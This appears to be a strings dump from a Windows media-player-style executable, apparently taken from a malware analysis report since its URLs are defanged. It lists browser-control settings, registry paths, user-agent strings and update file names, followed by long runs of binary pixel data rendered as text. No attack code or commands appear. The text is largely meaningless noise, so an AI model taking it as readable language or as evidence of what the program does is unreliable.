DontExecuteActiveX
DisableUrlIfEncodingUTF8
EnableUrlIfEncodingUTF8
CheckFontSupportsCodePage
DisableSubmitUrlInUTF8
EnableSubmitUrlInUTF8
lpMsg
PMsg
pguidCmdGroup
TTranslateUrlEvent
pchURLIn
ppchURLOut
CmdID
pszUrl
pszUrlContext
szPassWord
ErrorUrl
OptionKeyPath
OverrideOptionKeyPath`
OnTranslateUrl
OnCommandExec
'%s' is not supported.
WebocPopupManagement
ValidateNavigateUrl
HttpUsernamePasswordDisable
GetUrlDomFilePathUnencoded
XmlHttp
MAPI32.DLL
PTF://
hXXp://
hXXps://
AppEvents\Schemes\Apps\Explorer\Navigating\.Current
.Current
\ieframe.dll
\shdocvw.dll
\StringFileInfo\%0.4x%0.4x\%s
TMsgEvent
TKeyEventEx
Bypass
poPortrait
OnKeyDown<
0.750000
3333333
\Software\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent
\Software\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent\Post Platform
User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)(
EmbeddedWB hXXp://bsalsa.com/
TFileOperation
FileOperation
[(*&[^%$#]@!)]
Uh.YJ
OnActionExecute
SysConfig.ini
WJHTTP
%d.%d
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
0123456789
DSound.dll
Winmm.dll
Uh.TM
Uh%fN
Data\User2.ini
88888888
Update2.zip
Update3.zip
00000000
Update.zip
Update.Zip
Update2.Zip
Update3.Zip
FM4.exe
1.14.729.1
DMSet.Xml
/DM15/DMSet.Xml
hXXp://VVV.baidu.com
hXXp://update.yinyue.fm
8888-88-88
PlayerUpdate.exe
0000-00-00
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\
?456789:;<=
!"#$%&'()* ,-./0123
!v.JN
.uf 7(
jK%Sy
Jz&.Yj
W%smu
!/a.Rz
3.Ciz
g*$y`)$x_)%x^)%x_)%x^'%w["&rR
333333333333333333
33333833
3333339
3333333333333338
:*"*"$3338
33333333
33333333333
3333333333338
33338?383
333333333333
:*3:"$3338
333333333333333
@4(@4(@4(@4(@4(@4(@4(@4(@4(@4(@4(@4(
@4(@4(@4(@4(@4(@4(@4(@4(@4(@4(@4(
=4'=4'=4'=4'=4'=4'=4'=4'=4'=4'=4'
=4'=4'=4'=4'=4'=4'=4'=4'=4'=4'
<3&<3&<3&<3&<3&<3&<3&<3&<3&<3&
<3&<3&<3&<3&
<3&<3&<3&<3&<3&<3&<3&<3&<3&
@4(@4(@4(@4(@4(@4(=4'=4'=4'=4'=4'
=4'=4'=4'=4'=4'<3&<3&<3&<3&
[email protected]
N?/N?/N?/N?/N?/N?/N?/N?/N?/O?.N?/M>.PA1
NA1PA.OA/
OA.SB-O@0OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/RB2RB2RB2RB2RB2RB2RB2RB2RB2RB2RB2RB2RB2RB2RB2SC3RB2RB2RB2RB2RB2RB2RB2RB2RB2RB2QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1RB2RB2RB2RB2RB2RB2RB2RB2RB2RB2RB2RB2RB2RB2RB1RB1SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2RB1SC2RB1RB1QA0RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2TD3TD3TD3TD3TD3TD3TD3TD3TD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3UC2UC2UC2UC2UC2TB1UC2UC2UC2UC2UC2UC2UC2UC2UC2UC2VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3WF3WF3WF3WF3WF3VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2WF3VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3XG4XF5XF5XF5XF5XF5XF5XF5XF5XF5XF5XF5XF5VG4VG4VG4VG4VG4VG4VG4VG4VG4VG4VG4VG4VG4VG4VG4VG4WH5WH5WH5WH5WH5WH5WH5WH5WH5WH5WH5WH5WH5XI6XI6VG4VG4VG4VG4VG4VG4VG4VG4VG4VG4VG4VG4VG4VG4VG4VG4VG4YH5YH5XG4XG2XG2XG2XG2XG2XG2XG2XG2XG2XG2XG2XG2XG2XG2XG2XG2XG2XG2XG2XG2XG2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2\J3\J3\J3\J3\J3\J3\J3\J3\J3\J3\J3\J3\J3\J3\J3\J3\J3\J3\J3\J3\J3\J3\J3]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]J5]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4^L5]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4^I3^J1^J1^J1^J1^J1^J1^J1^J1^J1^J1^J1_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2^J1^J1^J1^J1^J1^J1^J1^J1_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2^J1`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3_K2`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3aM4aM4aM4aM4aM4aM4aM4aM4cM4cM4cM4cM4cM4
zoaI>0K=1M=0M>.kbX
RH>J=/J=/J=/J=/K>0J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L=-L=-L=-L=-L>,L>,L=-L=-L=-L=-L=-M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@[email protected]@[email protected]@[email protected]@[email protected]@[email protected]@[email protected]@[email protected]@.OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/[email protected]@[email protected]@[email protected]@[email protected]/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/QA0QA0QA0QA0P@/QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0P@/P@/P@/P@/P@/P@/P@/P@/QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0SA0SA0SA0SA0SA0SA0SA0SA0SA0SA0SA0SA0SA0SA0SA0SA0SA0SA0SA0SA0SA0TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1UC2UC2UC2UC2UC2UC2UC2UC2UC2UC2UD1UD1UD1UD1UD1UD1UD1UD1VE2VE2VE2UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2TE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2WF3WF3VE2VE2VE2VE2VE2VE2WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3XG4XG4WF3WF3YE3XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1[F1]F0]F0
g]SF9 E8*E8*E8*E8*F9 E8*E8*E8*E8*E8*E8*E8*E8*E8*E8*E8*F9 F9 F9 F9 F9 G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 F9 G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,E:,E:,G:,G:,G:,F9 F9 F9 F9 F9 F9 F9 F9 G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:,G:*H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; H; I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,I<,J; J; J; J; J; J; J; J; J; J; J; J; J; J; J; K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,J; J; J; J; J; J; J; J; J; J; J; J; J; J; J; K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,K<,L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-K<,K<,K<,K<,K<,K<,K<,K<,L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-M=-M=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-L=-M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/O?.O?.O?.O?.O?.O?.O?.O?.O?.O?.O?.O?.O?.O?.N>-N>-O?.O?.O?.O?.O?.O?.O?.O?.O?.O?.O?.O?.O?.N>-N>-N>-O?.O?.O?.O?.O?.O?.O?.O?.O?.O?.P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/RA.RA.R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/SA0SA0SA0SA0SA0TB1TB1TB1TB1TB1TB1TB1TB1SA0SA0SA0SA0SA0SA0SA0SA0R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/R@/P@/P@/QB/QB/QB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/QB/QB/QB/QB/QB/QB/QB/QB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/SB/RA.RA.RA.RA.RA.RA.RA.RA.RA.RA.RA.RA.RA.RA.RA.RA.RA.RA.RA.RA.RA.RA.RA.RA.PA.RA.RA.RA.RA.RA.RA.RA.RA.RA.PA.PA.PA.
?6)?6)?6)?6)?6)?6)?6)?6)<6)?6(?6)
@6,>6)?6)
?7*=5(>6)@7*@4(?5 ?5 
>5(>5(>5(>5(>5(>5(>5(>5(>5(>5'=5(>5'>6)@5'
;2(;2(;2(;2(;2(;2(;2(;2(;2(;2(;2(92)
<3)?4&=4'=4'=4&
:1':1':1':1':1':1':1':1';1'<2(;2(7/(
93(;2%;3&;2(
mf]<3%>3%SLCng^
|sP@/O@0M@2O@0N?/peWO@0O@0O@0O@0O@0OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/PA.MA/zqc
ZM?OA.OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/RB2RB2RB2RB2RB2RB2RB2RB2RB2RB2RB2RB2RB2RB2RB2SC3RB2RB2RB2RB2RB2RB2RB2RB2RB2RB2QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1QA1RB2RB2RB2RB2RB2RB2RB2RB2RB2RB2RB2RB2RB2RB2RB1RB1SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2RB1SC2RB1RB1QA0RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1RB1SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2SC2TD3TD3TD3TD3TD3TD3TD3TD3TD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3UC2UC2UC2UC2UC2TB1UC2UC2UC2UC2UC2UC2UC2UC2UC2UC2VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3VD3WF3WF3WF3WF3WF3VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2WF3VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3XG4XF5XF5XF5XF5XF5XF5XF5XF5XF5XF5XF5XF5VG4VG4VG4VG4VG4VG4VG4VG4VG4VG4VG4VG4VG4VG4VG4VG4WH5WH5WH5WH5WH5WH5WH5WH5WH5WH5WH5WH5WH5XI6XI6VG4VG4VG4VG4VG4VG4VG4VG4VG4VG4VG4VG4VG4VG4VG4VG4VG4YH5YH5XG4XG2XG2XG2XG2XG2XG2XG2XG2XG2XG2XG2XG2XG2XG2XG2XG2XG2XG2XG2XG2XG2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2[I2\J3\J3\J3\J3\J3\J3\J3\J3\J3\J3\J3\J3\J3\J3\J3\J3\J3\J3\J3\J3\J3\J3\J3]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]J5]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4^L5]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4]K4^I3^J1^J1^J1^J1^J1^J1^J1^J1^J1^J1^J1_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2^J1^J1^J1^J1^J1^J1^J1^J1_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2_K2^J1`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3_K2`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3`L3aM4aM4aM4aM4aM4aM4aM4aM4cM4cM4cM4cM4cM4
[email protected]@[email protected]?/[email protected]>.M>.YJ:
~J=/J=/J=/J=/J=/K>0J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/J=/L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L</L=-L=-L=-L=-L>,L>,L=-L=-L=-L=-L=-M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.M>.N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/N?/O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@0O@[email protected]@[email protected]@[email protected]@[email protected]@[email protected]@[email protected]@[email protected]@.OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/[email protected]@[email protected]@[email protected]@[email protected]/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/OA/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/P@/QA0QA0QA0QA0P@/QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0P@/P@/P@/P@/P@/P@/P@/P@/QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0QA0SA0SA0SA0SA0SA0SA0SA0SA0SA0SA0SA0SA0SA0SA0SA0SA0SA0SA0SA0SA0SA0TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1TB1UC2UC2UC2UC2UC2UC2UC2UC2UC2UC2UD1UD1UD1UD1UD1UD1UD1UD1VE2VE2VE2UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1UD1VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2TE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2VE2WF3WF3VE2VE2VE2VE2VE2VE2WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3WF3XG4XG4WF3WF3YE3XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0XE0YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1YF1[F1]F0]F0
